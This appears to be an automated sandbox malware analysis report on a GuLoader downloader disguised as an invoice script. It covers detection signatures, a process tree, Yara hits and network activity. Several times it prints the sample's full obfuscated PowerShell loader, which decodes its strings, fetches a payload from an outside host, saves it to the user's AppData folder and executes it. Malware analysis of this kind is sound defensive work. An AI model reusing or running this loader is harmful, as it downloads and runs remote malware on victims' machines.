Windows Analysis Report
INVOICE pdf.wsf

Overview

General Information

Sample name: INVOICE pdf.wsf
Analysis ID: 1428858
MD5: 62a9fb211e083aefa46e2a82cbef11bc
SHA1: f1e75cf66bbaf1ea3535bfe188f11d08dac775c8
SHA256: 7bf66677d4f93167a77e217bcf72899ffdbcd62cb79688fa7e7346ac91a14678
Tags: guloader wsf

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7508 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7536 cmdline: ping 127.0.0.1 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 7604 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. 
SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD 
temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. 
DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7984 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated script argument as PID 7732 above MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 8072 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7732; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: amsi32_7984.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen

          System Summary

          Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf", ProcessId: 7508, ProcessName: wscript.exe
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with the same obfuscated script argument shown for PID 7732 in the process tree (the report cuts this copy off)
          No Snort rule has matched

          AV Detection

          Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
          Source: INVOICE pdf.wsf | ReversingLabs: Detection: 15%
          Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
          Source: global traffic | HTTP traffic detected:
            GET /asdt/Kardinaliteter.pfb HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: originalconceptsinc.ru.com
            Connection: Keep-Alive
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | DNS traffic detected: queries for: originalconceptsinc.ru.com

          System Summary

          Source: amsi32_7984.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
          Source: INVOICE pdf.wsf | Static file information: Suspicious name
          Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7069
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 7069
          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 49%
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B89BF52
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B89B1A6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04B2F250
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04B2FB20
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04B2EF08
          Source: INVOICE pdf.wsf Initial sample: Strings found which are bigger than 50
          Source: amsi32_7984.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engine Classification label: mal100.troj.expl.evad.winWSF@19/6@1/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Benzidine233.Sjl
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pd5wkpoa.2hz.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7732
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7984
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: INVOICE pdf.wsf ReversingLabs: Detection: 15%
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
          Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
          Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo 